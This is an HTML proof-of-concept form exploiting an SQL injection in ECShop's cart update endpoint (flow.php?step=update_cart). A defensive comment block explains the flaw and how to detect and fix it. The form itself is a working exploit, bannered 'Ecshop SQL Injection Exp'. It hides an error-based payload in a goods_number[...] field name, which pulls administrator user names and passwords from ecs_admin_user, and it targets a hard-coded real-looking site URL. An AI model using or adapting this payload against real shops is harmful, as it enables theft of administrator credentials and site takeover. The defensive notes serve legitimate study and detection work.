<!--
  Proof-of-concept form for a SQL injection in the ECShop cart update
  endpoint (flow.php?step=update_cart). It posts a single multipart field
  to the hard-coded absolute URL in the action attribute.

  The payload sits in the field NAME, not in its value: the text between
  the brackets of goods_number[...] arrives on the server as an array key.
  NOTE(review): presumably the handler places that key into its cart query
  without casting it to an integer. Confirm against the flow.php of the
  deployed version.

  Defensive takeaways:
  - Treat the keys of array-style request parameters as untrusted input,
    exactly like values. Cast the goods_number key to an integer or reject
    non-numeric keys, and pass it to the database as a bound parameter.
  - Do not return database error text to clients. The nested
    count(*) / floor(rand(0)*2) / group by construct looks like the
    error-based pattern that leaks data through a duplicate-key message.
  - Detection: alert on requests to flow.php?step=update_cart in which a
    goods_number[...] key contains anything other than digits (quotes,
    parentheses, "select", "information_schema", "#").
  - The subquery reads user_name and password from ecs_admin_user, so
    matching log entries warrant rotating the administrator credentials.
-->
<FORM encType=multipart/form-data method=post name=myform action=http://www.mmmh.cn/flow.php?step=update_cart>  
<!-- Only the name attribute matters here; the value (21aaa) is not part of the injected SQL. -->
<INPUT value=21aaa type=text name="goods_number[-1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,user_name,0x7c,password,0x27,0x7e)) from ecs_admin_user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# and '1'='1]">  
<!-- Submit control; the request is sent only when it is activated manually. -->
<INPUT value="Do it" type=submit><BR>  
<!-- Author banner rendered as plain text inside the form. -->
Ecshop SQL Injection Exp [4 Fucker Team]  
</FORM> 